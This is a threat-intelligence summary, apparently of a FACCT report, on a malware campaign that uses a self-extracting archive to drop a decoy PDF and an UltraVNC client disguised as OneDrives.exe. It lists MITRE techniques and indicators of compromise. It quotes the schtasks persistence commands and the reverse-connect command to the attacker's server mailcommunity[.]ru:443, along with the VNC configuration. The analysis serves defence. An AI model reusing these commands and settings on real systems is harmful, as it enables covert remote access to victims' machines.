Keypoints
- FACCT found a PE32 self-extracting 7zSFX archive (7ZSfxMod_x86.exe) that extracts to %TEMP% and runs an obfuscated batch (5951402583331559.cmd).
- The archive contains a decoy PDF (perevod.pdf), an UltraVNC executable renamed OneDrives.exe, and an UltraVNC.ini configuration file.
- The batch file copies and opens the decoy PDF, copies the UltraVNC binary and config to %TEMP%, kills any existing OneDrives.exe, and launches the VNC client.
- Persistence and scheduled execution are achieved by creating multiple Windows Scheduled Tasks that run/kills OneDrives.exe and launch it with connection parameters (-autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443).
- UltraVNC is configured for remote access (PortNumber=5612, HTTPPortNumber=5800), file transfer enabled, disabled tray icon, and an embedded password in UltraVNC.ini.
- Attackers used mailcommunity[.]ru:443 as the C2 and deployed additional Go-language droppers with identical UltraVNC configuration and the same C2 address.
MITRE Techniques
- [T1204.002] User Execution: Malicious File – The lure opens a decoy PDF to engage the user (‘Opening a decoy document to distract the victim’s attention: start “” “%CD%perevod.pdf””‘).
- [T1027] Obfuscated Files or Information – The archive executes an obfuscated batch script to hide actions (‘obfuscated Batch file 5951402583331559.cmd’).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The installer runs multiple cmd.exe commands to rename, copy files, change directories and execute the batch (‘cmd.exe /c ren 5951402583331559 5951402583331559.cmd’).
- [T1053.005] Scheduled Task/Job – Persistence and automated execution are implemented via schtasks to create tasks that run and kill OneDrives.exe (‘schtasks /create /f /tn … /tr “%HOMEDRIVE%%HOMEPATH%AppDataLocalTempOneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443″‘).
- [T1071.001] Application Layer Protocol: Web Protocols – Command-and-control uses HTTPS to the attacker domain (‘-connect mailcommunity[.]ru:443’ and ‘start … -connect mailcommunity[.]ru:443’).
- [T1036.005] Masquerading: Match Legitimate Name or Location – Attackers disguise UltraVNC as a OneDrive-branded executable and resource icon to blend in (‘OneDrive application icon for hidden remote access’).
Indicators of Compromise
- [File hash] 7ZSfxMod_x86.exe – MD5: b4644e784d384e419a270c8a44f41dd2, SHA-256: 0de3e1349b12a96a99784c45aebb f88012562545af6ade624e78d0ff2cfd5f35
- [File hash] OneDrives.exe (UltraVNC) – MD5: d45bdf072094435bbb534b9a0c254af5, SHA-1: e1c24d8bfab674937f498701f8b25d07c56dada0
- [Domain C2] mailcommunity[.]ru – used as the command-and-control server (connect via :443)
- [IP address] 185.139.70[.]84 – observed infrastructure associated with the campaign
- [File paths] Temporary drop locations – %TEMP%OneDrives.exe, %TEMP%UltraVNC.ini, %TEMP%perevod.pdf
- [Filenames] Batch and decoy – 5951402583331559.cmd, Px69S29l29t79I69v3.ei89I49K79k99b89f2 (perevod.pdf)
The 7zSFX (7ZSfxMod_x86.exe) extracts its payload into %TEMP% and renames/launches an obfuscated batch (5951402583331559.cmd) which reconstructs a decoy PDF, an UltraVNC.ini configuration, and the UltraVNC binary disguised as OneDrives.exe. The archive executes a sequence of command-shell operations (cmd.exe /c ren/copy/cd) to place these files into %USERPROFILE%AppDataLocalTemp and then runs the batch to continue the setup.
The batch performs the following automated actions: copies and opens the decoy PDF to distract the user, copies the UltraVNC executable to OneDrives.exe, forces termination of any existing OneDrives.exe process, and creates multiple scheduled tasks via schtasks—one to kill OneDrives.exe, one to run OneDrives.exe daily, and another to run it with parameters that cause the client to autoreconnect with a randomized id to the C2. The runnable command used for network connection is: OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443.
The deployed UltraVNC is a legitimate v1.2.0.5 binary with a custom UltraVNC.ini enabling file transfer, disabling the tray icon, and setting PortNumber=5612 and HTTPPortNumber=5800; a password field is present in the config. FACCT also observed Go-language droppers with identical UltraVNC configuration and the same mailcommunity[.]ru:443 C2, indicating reuse of the VNC client, config and infrastructure across multiple loaders.
Read more: https://habr.com/ru/companies/f_a_c_c_t/articles/808143